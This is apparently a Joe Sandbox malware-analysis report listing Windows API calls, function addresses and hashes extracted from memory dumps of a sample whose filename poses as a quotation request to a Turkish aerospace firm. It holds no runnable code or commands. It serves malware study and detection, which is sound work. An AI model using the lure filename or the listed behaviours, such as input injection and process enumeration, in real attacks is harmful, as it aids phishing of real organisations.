PostMessageW.USER32(00000000,00000101,00000000), ref: 001EAC74
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 001EACC6

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 08990334750f155c7aa153132e0678114322c0f31df561200bf505905c5d3b8e
Instruction ID: 46a57ea9fe70e17a4cb22611eaee0d95b61178f89adbc4a75615a64dd314ccee
Opcode Fuzzy Hash: 08990334750f155c7aa153132e0678114322c0f31df561200bf505905c5d3b8e
Instruction Fuzzy Hash: AE313930A40B986FEF34CB668C087FE7FA5AF95310FA8431AE485571D0C374A9858753

Function 00217674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0021769A
GetWindowRect.USER32(?,?), ref: 00217710
PtInRect.USER32(?,?,00218B89), ref: 00217720
MessageBeep.USER32(00000000), ref: 0021778C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: a688231199140ed2fe0e116b56744ac411789ab147d0e7a15399aeef55658d93
Instruction ID: bccec3dd7a55615e5e0a0b19996620cd709ac552401c6a6dfdda0fcf26f6dfd1
Opcode Fuzzy Hash: a688231199140ed2fe0e116b56744ac411789ab147d0e7a15399aeef55658d93
Instruction Fuzzy Hash: E041AD38A15215DFCB01CF58D898EE9F7F5FBA9314F1480A8E4149B2A1C730E9A2CF90

Function 002116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002116EB

Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65

GetCaretPos.USER32(?), ref: 002116FF
ClientToScreen.USER32(00000000,?), ref: 0021174C
GetForegroundWindow.USER32 ref: 00211752

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 9ba6e7a204aa1e466b068d319960caf2daafc680796e97687e24b25540aa371a
Instruction ID: 40cc8c5bec253c7b443b7ca82b6fbba86019fb3cda1fb8028806b8b98e487909
Opcode Fuzzy Hash: 9ba6e7a204aa1e466b068d319960caf2daafc680796e97687e24b25540aa371a
Instruction Fuzzy Hash: CE315D75D00149AFDB00EFA9D8858EEBBF9EF58304B6080A9E515E7251DB319E45CFA0

Function 001ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001ED501
Process32FirstW.KERNEL32(00000000,?), ref: 001ED50F
Process32NextW.KERNEL32(00000000,?), ref: 001ED52F
CloseHandle.KERNEL32(00000000), ref: 001ED5DC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5e25357bc2810b789f31a3417652135b03c0629dbfc38a1ef21886fbfb156ffd
Instruction ID: bb764770f4eef3a46fba917020aa7500a7ad7283d51cf479315f4fecb6d3fffe
Opcode Fuzzy Hash: 5e25357bc2810b789f31a3417652135b03c0629dbfc38a1ef21886fbfb156ffd
Instruction Fuzzy Hash: 4E31D4310083409FD304EF54E885ABFBBF8EFA9344F14092DF585871A1EB719A49CB92

Function 00218FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

GetCursorPos.USER32(?), ref: 00219001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001D7711,?,?,?,?,?), ref: 00219016
GetCursorPos.USER32(?), ref: 0021905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001D7711,?,?,?), ref: 00219094

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2cd16b3d28ec5cb65d2c6778bb6028beaba0fcca20874b929a106e66e21367bd
Instruction ID: 590ba3ac0c2896055f0f6af5f63cf619b51938b9d30817503de00268c02f8203
Opcode Fuzzy Hash: 2cd16b3d28ec5cb65d2c6778bb6028beaba0fcca20874b929a106e66e21367bd
Instruction Fuzzy Hash: BD21AD35610118AFCB25CF94D868FEA3BF9EB99361F104069F90557261C7319DE0DB60

Function 001ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0021CB68), ref: 001ED2FB
GetLastError.KERNEL32 ref: 001ED30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 001ED319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0021CB68), ref: 001ED376

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 5aacce4636d98cefde58f0d8ec4136ff93b285a49d16060baac7c9d8d11de685
Instruction ID: 387e1d226f27c01456a2303197a163b5096ce188d3731ca852847c1b0f1350bd
Opcode Fuzzy Hash: 5aacce4636d98cefde58f0d8ec4136ff93b285a49d16060baac7c9d8d11de685
Instruction Fuzzy Hash: BA21D3B45086019F8300EF25E8814AEB7E4FF66724F244A1DF499C72E1DB30DA45CB93

Function 001E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001E102A
Part of subcall function 001E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001E1036
Part of subcall function 001E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1045
Part of subcall function 001E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001E104C
Part of subcall function 001E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001E15BE
_memcmp.LIBVCRUNTIME ref: 001E15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E1617
HeapFree.KERNEL32(00000000), ref: 001E161E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 73fa9177ef6e517b00c65be157de24f33e6a57d80369d5e487addc03e4bae560
Instruction ID: 06a202e58f6918a7ce0fc5ccdd695f7ad0c8777fb1578c9c52a57d6d25ff19d7
Opcode Fuzzy Hash: 73fa9177ef6e517b00c65be157de24f33e6a57d80369d5e487addc03e4bae560
Instruction Fuzzy Hash: BE216631E40608BFDF00DFA6C949BEEB7F8EF59354F188459E445AB241E770AA05CBA0

Function 00212782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0021280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00212824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00212832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00212840

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ba2658c19faf8c4488f356d2fd2e91f4a29ecd69c72f909fd1c1c1ed05e7347a
Instruction ID: 62e0c7c66083a2862d9fe5a393047d521153742fc2cdf94afbd7a666b15c4a90
Opcode Fuzzy Hash: ba2658c19faf8c4488f356d2fd2e91f4a29ecd69c72f909fd1c1c1ed05e7347a
Instruction Fuzzy Hash: 1C21F435214111EFD7149B24D844FEABB95EF65324F248158F4268B2D2CB71FCA6CBD0

Function 001E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?), ref: 001E8D8C
Part of subcall function 001E8D7D: lstrcpyW.KERNEL32(00000000,?,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E8DB2
Part of subcall function 001E8D7D: lstrcmpiW.KERNEL32(00000000,?,001E790A,?,000000FF,?,001E8754,00000000,?,0000001C,?,?), ref: 001E8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7923
lstrcpyW.KERNEL32(00000000,?,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,001E8754,00000000,?,0000001C,?,?,00000000), ref: 001E7984

Strings

cdecl, xrefs: 001E797B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e25b993cd00f7c35b6113ff191bb11a47352d546512e77454868e1d7fb87db63
Instruction ID: abc14888a7653a265cb9170ef7841e54210e948523a639cac05271d6b908eed7
Opcode Fuzzy Hash: e25b993cd00f7c35b6113ff191bb11a47352d546512e77454868e1d7fb87db63
Instruction Fuzzy Hash: 7411293A200782ABDF156F39DC44E7E77A5FF55364B10802AF806C72A5EF319811C751

Function 00215660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002156BB
_wcslen.LIBCMT ref: 002156CD
_wcslen.LIBCMT ref: 002156D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00215816

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 4e07f421c6b270f642d2b6c9d47aa1184fa63603c820d01bb431e4bcc33b7ed8
Instruction ID: 9a51a2c5a79aaf9606eb0d85ecfbbf262788eae534157a56fe3d7b7c1cb441ac
Opcode Fuzzy Hash: 4e07f421c6b270f642d2b6c9d47aa1184fa63603c820d01bb431e4bcc33b7ed8
Instruction Fuzzy Hash: 7811E435620629D6DB209F61CC85AEE77ECBFB5364B1040A6F905D6081EBB089E0CBA0

Function 001E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 001E1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001E1A8A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f4094be47c3d70794f89114a1e63e0801b2e17035f0088b64ee4e1604d0ff5c7
Instruction ID: 493a62f0a5ad621815a0e89f2ed47ecec3de3a78b8150363411968330f036f84
Opcode Fuzzy Hash: f4094be47c3d70794f89114a1e63e0801b2e17035f0088b64ee4e1604d0ff5c7
Instruction Fuzzy Hash: A811393AD01259FFEB10DBA5CD85FADBB79EB48750F2000A1EA01B7290D7716E50DB94

Function 001EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001EE1FD
MessageBoxW.USER32(?,?,?,?), ref: 001EE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001EE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001EE24D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 81bceb2948686ebaad94d0a7f4ae90f3c038237d5e3692d2bbce3869cbbe82e1
Instruction ID: 543ee8324e56b0fca3627876cd11075eb6922d7b6a66ad18c8a9d7439aa45981
Opcode Fuzzy Hash: 81bceb2948686ebaad94d0a7f4ae90f3c038237d5e3692d2bbce3869cbbe82e1
Instruction Fuzzy Hash: E811087A904255BBC7019FA8BC0DBDE7FAC9B45321F108255F925D3290D7B0890487A0

Function 001AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,001ACFF9,00000000,00000004,00000000), ref: 001AD218
GetLastError.KERNEL32 ref: 001AD224
__dosmaperr.LIBCMT ref: 001AD22B
ResumeThread.KERNEL32(00000000), ref: 001AD249

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: b92dba293b8eaa077ba71622408a661a2604d0e1ff9769ba536666b392cf2040
Instruction ID: bf94c438bef13abe1670563b577b27c3236d7e53a7caf7876b32560fe7200ef2
Opcode Fuzzy Hash: b92dba293b8eaa077ba71622408a661a2604d0e1ff9769ba536666b392cf2040
Instruction Fuzzy Hash: D201D67E4455047BC7116BA5EC09BAE7A69DF93330F20425AF926925D0DF70C905C6A0

Function 0018600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
GetStockObject.GDI32(00000011), ref: 00186060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 651830dda14b4daf496bfd8f5766a86872a2792cde72ee4c12a03d5a1c6d4bc1
Instruction ID: 0b43fe52e3d74a6b5d077544118ec868737b9e0ce67390828cf8dd36866b88f4
Opcode Fuzzy Hash: 651830dda14b4daf496bfd8f5766a86872a2792cde72ee4c12a03d5a1c6d4bc1
Instruction Fuzzy Hash: 9411AD72101508BFEF165FA49C48EEABB6DEF183A4F104205FA0452110CB36DD60DFA4

Function 001A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001A3B56

Part of subcall function 001A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001A3AD2
Part of subcall function 001A3AA3: ___AdjustPointer.LIBCMT ref: 001A3AED

_UnwindNestedFrames.LIBCMT ref: 001A3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001A3B7C
CallCatchBlock.LIBVCRUNTIME ref: 001A3BA4

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: cab9de5d83afc1d6b6022b67b0fb2fc8224a42260f2ecc0ec4951937660f6bcd
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: D7014C36100148BBDF125E95DC42EEB7F6EEF9A754F044014FE5896121C772E961EBA0

Function 001B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001813C6,00000000,00000000,?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue), ref: 001B30A5
GetLastError.KERNEL32(?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue,00222290,FlsSetValue,00000000,00000364,?,001B2E46), ref: 001B30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001B301A,001813C6,00000000,00000000,00000000,?,001B328B,00000006,FlsSetValue,00222290,FlsSetValue,00000000), ref: 001B30BF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: adc47acd30c47889a6f3304bfe401a745a8cc2731c539fa71def087377780fcd
Instruction ID: 479e3d75ed82c9e5a37c8f1957f27bd53424f93ff1d96105658ccca1b6b7b798
Opcode Fuzzy Hash: adc47acd30c47889a6f3304bfe401a745a8cc2731c539fa71def087377780fcd
Instruction Fuzzy Hash: 9E01F73A745332ABCB315B78BC489E77B98AF55B61B214620FD26E3140CF31D911C6E0

Function 001E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001E747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001E7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001E74AC
